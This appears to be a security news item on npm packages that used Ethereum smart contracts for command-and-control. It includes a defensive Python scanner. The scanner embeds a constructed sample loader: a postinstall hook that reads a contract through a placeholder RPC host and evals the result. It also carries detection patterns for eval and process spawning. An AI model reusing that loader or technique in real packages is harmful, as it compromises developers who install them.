Researchers discovered two malicious npm packages that use Ethereum smart contracts for command-and-control (C2), a tactic new to open-source supply-chain attacks: the attackers store their malicious commands in a smart contract, so the packages carry no hard-coded C2 endpoint to block or blocklist, and the malicious traffic blends in with ordinary blockchain RPC reads, which makes detection harder. The campaign also involved extensive GitHub deception, with fabricated repositories and fake activity (stars, commits, forks) designed to lure developers into installing the packages.
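As an added illustration of what a defender can look for, the heuristic scanner below is example code written for this page, not the researchers' tooling or anything from the real campaign. It scans a package's files for the combination the technique implies: an npm lifecycle hook that runs code on install, a blockchain client library or contract read (a hypothetical use of the ethers API is assumed in the constructed sample), and dynamic code execution of whatever the chain returned. The sample package contents, addresses and RPC URL are constructed for the example.

```python
import json
import re

# Constructed sample of a package in the style described above (not the real packages).
# The 40-hex-char address is built programmatically so it is a syntactically valid one.
FAKE_CONTRACT_ADDR = "0x" + "0" * 39 + "1"
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-lib",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
        "dependencies": {"ethers": "^6.0.0"},
    }),
    "setup.js": (
        'const { ethers } = require("ethers");\n'
        'const provider = new ethers.JsonRpcProvider("https://rpc.example.invalid");\n'
        'const abi = ["function getValue() view returns (string)"];\n'
        f'const contract = new ethers.Contract("{FAKE_CONTRACT_ADDR}", abi, provider);\n'
        'contract.getValue().then(cmd => { eval(cmd); });\n'
    ),
}

# Constructed benign package for contrast.
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "clean-lib", "scripts": {"test": "jest"}}),
    "index.js": "module.exports = (a, b) => a + b;\n",
}

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
CHAIN_LIBS = {"ethers", "web3", "viem"}
CODE_PATTERNS = {
    "chain_rpc_provider": re.compile(r"JsonRpcProvider\(|new\s+Web3\(|eth_call"),
    "contract_read": re.compile(r"new\s+\w*\.?Contract\("),
    "eth_address": re.compile(r"0x[0-9a-fA-F]{40}\b"),
    "dynamic_eval": re.compile(r"\beval\(|new\s+Function\(|vm\.runIn"),
    "process_spawn": re.compile(r"child_process|execSync\(|spawn\("),
}


def scan_package(files):
    """Return a list of human-readable findings for a dict of {filename: contents}."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    scripts = manifest.get("scripts", {})
    for hook in sorted(LIFECYCLE_HOOKS & set(scripts)):
        findings.append(f"lifecycle hook: {hook} -> {scripts[hook]}")
    deps = set(manifest.get("dependencies", {})) | set(manifest.get("devDependencies", {}))
    for dep in sorted(CHAIN_LIBS & deps):
        findings.append(f"blockchain client dependency: {dep}")
    for name, text in files.items():
        if not name.endswith((".js", ".mjs", ".cjs", ".ts")):
            continue
        for label, pattern in CODE_PATTERNS.items():
            if pattern.search(text):
                findings.append(f"{name}: {label}")
    return findings


def verdict(findings):
    """True when install-time execution, a chain read and dynamic execution all co-occur.

    Any one indicator alone is common in legitimate packages; the combination is what
    distinguishes a contract-hosted C2 loader from, say, a dApp SDK with a build hook.
    """
    joined = " ".join(findings)
    runs_on_install = "lifecycle hook" in joined
    reads_chain = any(k in joined for k in ("blockchain client dependency", "contract_read", "chain_rpc_provider"))
    executes_payload = any(k in joined for k in ("dynamic_eval", "process_spawn"))
    return runs_on_install and reads_chain and executes_payload


if __name__ == "__main__":
    for label, pkg in (("sample", SAMPLE_PACKAGE), ("benign", BENIGN_PACKAGE)):
        found = scan_package(pkg)
        print(label, "suspicious" if verdict(found) else "clean")
        for line in found:
            print("  ", line)
```

The scanner is deliberately conservative: it reports each indicator but only calls a package suspicious when the install hook, the chain read and the execution sink appear together, which is the shape this campaign takes; run it over the extracted tarball before the hook fires, because after `npm install` the contract has already been read.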
Latest mentioned: 09-09
Earliest mentioned: 09-03